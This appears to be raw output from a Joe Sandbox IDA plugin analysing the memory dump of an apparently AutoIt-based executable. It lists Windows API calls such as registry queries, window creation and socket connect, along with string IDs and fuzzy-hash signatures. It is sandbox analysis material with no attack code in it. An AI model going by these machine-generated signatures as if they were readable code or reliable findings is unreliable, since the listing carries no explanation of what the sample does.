                                          • Part of subcall function 0032BDF0: _wcscat.LIBCMT ref: 0032BF46
                                          • Part of subcall function 0032BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 0032BF56
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error$E<2$G-2
                                        • API String ID: 1510338132-1910664700
                                        • Opcode ID: 9780d8dccb70ddd06728ccb50b2e2d6828753e3feed2e4c873a2cb70b1336a58
                                        • Instruction ID: 36b2f821747686e7206e3bc19b899673c0c53821d8cc680836bea134bd59625d
                                        • Opcode Fuzzy Hash: 9780d8dccb70ddd06728ccb50b2e2d6828753e3feed2e4c873a2cb70b1336a58
                                        • Instruction Fuzzy Hash: 40915071A10269AFCF06EFA4DC919EEB7B4BF05310F144429F416AF291EB74AE05CB50
                                        APIs
                                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0033EADA,?,?), ref: 0033EB27
                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,0033EADA,?,?), ref: 00394B26
                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,0033EADA,?,?), ref: 00394B65
                                        • RegCloseKey.ADVAPI32(?,?,0033EADA,?,?), ref: 00394B94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: QueryValue$CloseOpen
                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                        • API String ID: 1586453840-614718249
                                        • Opcode ID: 7015504bbff8d1cb33aebbbb43aeac614de232f713aeac6d32fc9f4a34c96205
                                        • Instruction ID: 43a24568c21886dd9f74e25314faf8f3303adda22618cbaebb8d03aeb13d05bc
                                        • Opcode Fuzzy Hash: 7015504bbff8d1cb33aebbbb43aeac614de232f713aeac6d32fc9f4a34c96205
                                        • Instruction Fuzzy Hash: 08114F71600118BEEB06DBA4DD86EFF77BCEF04358F100055F606E6190EA709E01DB50
                                        APIs
                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00322ECB
                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00322EEC
                                        • ShowWindow.USER32(00000000), ref: 00322F00
                                        • ShowWindow.USER32(00000000), ref: 00322F09
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$CreateShow
                                        • String ID: AutoIt v3$edit
                                        • API String ID: 1584632944-3779509399
                                        • Opcode ID: b45da5f349088e64941c0d61e8f3a039cd56afd8f9e31570e85a77f094e6467d
                                        • Instruction ID: 9310b9b1b745b6d8c9f7ae273c2af6febd571294348a7a849bad03e3627f78d4
                                        • Opcode Fuzzy Hash: b45da5f349088e64941c0d61e8f3a039cd56afd8f9e31570e85a77f094e6467d
                                        • Instruction Fuzzy Hash: 3CF0D0755402D07ADB329B576C88E772E7DD7C7F24F01421EBA059A1B0D5710CD5DA70
                                        APIs
                                          • Part of subcall function 00323B1E: _wcsncpy.LIBCMT ref: 00323B32
                                        • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00366DBA
                                        • GetLastError.KERNEL32 ref: 00366DC5
                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00366DD9
                                        • _wcsrchr.LIBCMT ref: 00366DFB
                                          • Part of subcall function 00366D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00366E31
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                        • String ID:
                                        • API String ID: 3633006590-0
                                        • Opcode ID: 988925db24dfd29bf085793f022373e0263fb6f83aee954dbb959900101c6a1f
                                        • Instruction ID: f4268a73b0650792929e40109b8e41007ce20310e0b31987bffbc77e6a847267
                                        • Opcode Fuzzy Hash: 988925db24dfd29bf085793f022373e0263fb6f83aee954dbb959900101c6a1f
                                        • Instruction Fuzzy Hash: EE21E4756013149ADF277B74ED4BBEA33ACCF02390F218556E421CB0D6EF21DE848A64
                                        APIs
                                          • Part of subcall function 0037ACD3: inet_addr.WS2_32(00000000), ref: 0037ACF5
                                        • socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 00379160
                                        • WSAGetLastError.WS2_32(00000000), ref: 0037916F
                                        • connect.WS2_32(00000000,?,00000010), ref: 0037918B
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ErrorLastconnectinet_addrsocket
                                        • String ID:
                                        • API String ID: 3701255441-0
                                        • Opcode ID: 48b8de832a60a391b9e11b39811c0815c32d1d3da48bc8cbbd2386bb5a72886e
                                        • Instruction ID: d491eea201042fd7913ea895e4f38d68657c8f008fca9ae608bdfa7094ece19c
                                        • Opcode Fuzzy Hash: 48b8de832a60a391b9e11b39811c0815c32d1d3da48bc8cbbd2386bb5a72886e
                                        • Instruction Fuzzy Hash: 3D2190312006119FDB16AF68CC8AB6E77ADEF49724F048519F95AAB392CA74EC018B51
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: dE=
                                        • API String ID: 0-1710837183
                                        • Opcode ID: 5423aeacb7586107c9a9d02b4dead90c57cb540af2ff379064d5ab83bf299258
                                        • Instruction ID: 748ba113d65e8422a42e6e6d6a90e92dbdb99f92c452b844e7b9838eb8df5c60
                                        • Opcode Fuzzy Hash: 5423aeacb7586107c9a9d02b4dead90c57cb540af2ff379064d5ab83bf299258
                                        • Instruction Fuzzy Hash: CBF18C716087019FC722DF28C880B5AB7E5FF88314F10896EF9999B292D735E905CF82
                                        APIs
                                        • SHGetMalloc.SHELL32(1<2), ref: 00323A7D
                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00323AD2
                                        • SHGetDesktopFolder.SHELL32(?), ref: 00323A8F
                                          • Part of subcall function 00323B1E: _wcsncpy.LIBCMT ref: 00323B32
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                        • String ID: 1<2
                                        • API String ID: 3981382179-1640791754
                                        • Opcode ID: 3e8bd59d1e5eba8a1eebc839eacb5ad41308bd5c501327cffa7db7046a43c6b1
                                        • Instruction ID: 7b52b14edc66c869afd8598ea9bd52b9581069d937b4fc33084487dbd4c4227d
                                        • Opcode Fuzzy Hash: 3e8bd59d1e5eba8a1eebc839eacb5ad41308bd5c501327cffa7db7046a43c6b1
                                        • Instruction Fuzzy Hash: 17215E76B00128ABCB15DF95DC88DEEB7BDEF89700B1040A8F50ADB251DB749E46CB90
                                        APIs
                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0033C948,SwapMouseButtons,00000004,?), ref: 0033C979
                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,0033C948,SwapMouseButtons,00000004,?,?,?,?,0033BF22), ref: 0033C99A
                                        • RegCloseKey.KERNEL32(00000000,?,?,0033C948,SwapMouseButtons,00000004,?,?,?,?,0033BF22), ref: 0033C9BC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID: Control Panel\Mouse
                                        • API String ID: 3677997916-824357125
                                        • Opcode ID: c3f60d1807f35c3a24f68d11be1a6ecacde6f131371ac296986de040d2f3e90f
                                        • Instruction ID: 52faccc036b74348d089ae49a2e6e92a234e5d71989cfd4b79546b7c583d5236
                                        • Opcode Fuzzy Hash: c3f60d1807f35c3a24f68d11be1a6ecacde6f131371ac296986de040d2f3e90f
                                        • Instruction Fuzzy Hash: 52113C75521208BFDB12CF64DC84EEF77BCEF05744F12945AA945E7210E731AE509B60
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 768217c2182a650eac814016dd6fa8c55f098d3f35444bb0d790220a6a17fafb
                                        • Instruction ID: b2937576f338651d8b29de785c479f6553fedacc68f0bb21be7c551d44292334
                                        • Opcode Fuzzy Hash: 768217c2182a650eac814016dd6fa8c55f098d3f35444bb0d790220a6a17fafb
                                        • Instruction Fuzzy Hash: F4C19075A0061AEFCB15CF94C884EAEB7B5FF48301F114698ED01AB261D730DE45EBA1
                                        APIs
                                          • Part of subcall function 003216F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00321751
                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0032159B
                                        • CoInitialize.OLE32(00000000), ref: 00321612
                                        • CloseHandle.KERNEL32(00000000), ref: 003958F7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                        • String ID: '/6
                                        • API String ID: 458326420-535110787
                                        • Opcode ID: e6a9184a0bd4e0bf1bc842780bd4257ef1064f712c7525f8c4c610b427610485
                                        • Instruction ID: 07791e7d71d18bf18152b3e41c208142403fa75d998ad74ed71e8da3193c898f
                                        • Opcode Fuzzy Hash: e6a9184a0bd4e0bf1bc842780bd4257ef1064f712c7525f8c4c610b427610485
                                        • Instruction Fuzzy Hash: 837198B99012D58AC723DF6BB9D0898BABCFB59744B94432ED00A8F7E2DB7044849F11
                                        APIs
                                          • Part of subcall function 003241A7: _fseek.LIBCMT ref: 003241BF
                                          • Part of subcall function 0036CE59: _wcscmp.LIBCMT ref: 0036CF49
                                          • Part of subcall function 0036CE59: _wcscmp.LIBCMT ref: 0036CF5C
                                        • _free.LIBCMT ref: 0036CDC9
                                        • _free.LIBCMT ref: 0036CDD0
                                        • _free.LIBCMT ref: 0036CE3B
                                          • Part of subcall function 003428CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00348715,00000000,003488A3,00344673,?), ref: 003428DE
                                          • Part of subcall function 003428CA: GetLastError.KERNEL32(00000000,?,00348715,00000000,003488A3,00344673,?), ref: 003428F0
                                        • _free.LIBCMT ref: 0036CE43
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                        • String ID:
                                        • API String ID: 1552873950-0
                                        • Opcode ID: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
                                        • Instruction ID: efe8a3c6eddd0578fa59cd8dd39cf6e3d0ff4ceaaf18b757db2c82303f3d621e
                                        • Opcode Fuzzy Hash: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
                                        • Instruction Fuzzy Hash: 11515FB1904218AFDF159F64DC81AAEB7B9EF08300F1040AEF659A7241D7716A90CF29
                                        APIs
                                        • _memset.LIBCMT ref: 00321E87
                                          • Part of subcall function 003238E4: _memset.LIBCMT ref: 00323965
                                          • Part of subcall function 003238E4: _wcscpy.LIBCMT ref: 003239B5
                                          • Part of subcall function 003238E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 003239C6
                                        • KillTimer.USER32(?,00000001), ref: 00321EDC
                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00321EEB
                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00394526
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                        • String ID:
                                        • API String ID: 1378193009-0
                                        • Opcode ID: 0b97a6cbe52255542eb2f67cf3b6cc15445589f9307a2c67311994070de696a4
                                        • Instruction ID: 9c297789e6aa59ca0bb48b9a1c0e37a9c1ac28e94c936e5865226c42075bf684
                                        • Opcode Fuzzy Hash: 0b97a6cbe52255542eb2f67cf3b6cc15445589f9307a2c67311994070de696a4
                                        • Instruction Fuzzy Hash: 472138B1904394AFEB338B64DC55FEBBBEC9B16308F06008DE69E5B181C7746A85CB51
                                        APIs
                                          • Part of subcall function 0033F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0036AEA5,?,?,00000000,00000008), ref: 0033F282
                                          • Part of subcall function 0033F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0036AEA5,?,?,00000000,00000008), ref: 0033F2A6
                                        • gethostbyname.WS2_32(?), ref: 003792F0
                                        • WSAGetLastError.WS2_32(00000000), ref: 003792FB
                                        • _memmove.LIBCMT ref: 00379328
                                        • inet_ntoa.WS2_32(?), ref: 00379333
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                        • String ID:
                                        • API String ID: 1504782959-0
                                        • Opcode ID: 9a64e074bed78ae7bf0a41092b80a3ef4a7ff7b9422de5ad3cfca114681ba933
                                        • Instruction ID: 472af2680db209451ce41e0aa49d893768f276c738da5318c3df56166dc83369
                                        • Opcode Fuzzy Hash: 9a64e074bed78ae7bf0a41092b80a3ef4a7ff7b9422de5ad3cfca114681ba933
                                        • Instruction Fuzzy Hash: 35116035900519AFCB16FFA0DD56DEE77BDEF08310B108025F506AB2A2DB30AE04DB51
                                        APIs
                                          • Part of subcall function 0032193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00321952
                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0035E344
                                        • _strlen.LIBCMT ref: 0035E34F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout_strlen
                                        • String ID: @U=u
                                        • API String ID: 2777139624-2594219639
                                        • Opcode ID: 528ab9bd1fe8c8e7db9c157349c1362f7cfe61479372c6f44d068e2b3be9bc2d
                                        • Instruction ID: 9eaf747a3d1ed926cdb4adcf148499a6785dbd842d230726bf87e4bc96a0e348
                                        • Opcode Fuzzy Hash: 528ab9bd1fe8c8e7db9c157349c1362f7cfe61479372c6f44d068e2b3be9bc2d
                                        • Instruction Fuzzy Hash: A111E33520021467CB0ABF69EC86DBF7BA89F45341B000479FA06DF1A2DE749A4986A0
                                        APIs
                                          • Part of subcall function 003445EC: __FF_MSGBANNER.LIBCMT ref: 00344603
                                          • Part of subcall function 003445EC: __NMSG_WRITE.LIBCMT ref: 0034460A
                                          • Part of subcall function 003445EC: RtlAllocateHeap.NTDLL(017C0000,00000000,00000001), ref: 0034462F
                                        • std::exception::exception.LIBCMT ref: 0034013E
                                        • __CxxThrowException@8.LIBCMT ref: 00340153
                                          • Part of subcall function 00347495: RaiseException.KERNEL32(?,?,0032125D,003D6598,?,?,?,00340158,0032125D,003D6598,?,00000001), ref: 003474E6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                        • String ID: bad allocation
                                        • API String ID: 3902256705-2104205924
                                        • Opcode ID: f83937dcff58a724d11853eed29e5213254103d999eacf30f4a1547be84aa889
                                        • Instruction ID: 26b613da4b796d6c149587b8195db0fb39de1ed639e60e2238a96000606e25b4
                                        • Opcode Fuzzy Hash: f83937dcff58a724d11853eed29e5213254103d999eacf30f4a1547be84aa889
                                        • Instruction Fuzzy Hash: 7AF0687D20821D66CB1BAFE8DC029DE7BEC9F05350F100456FA06AE581DBB0F68096E5
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0032C00E,?,?,?,?,00000010), ref: 0032C627
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 0032C65F
                                        • _memmove.LIBCMT ref: 0032C697
                                        Memory Dump Source
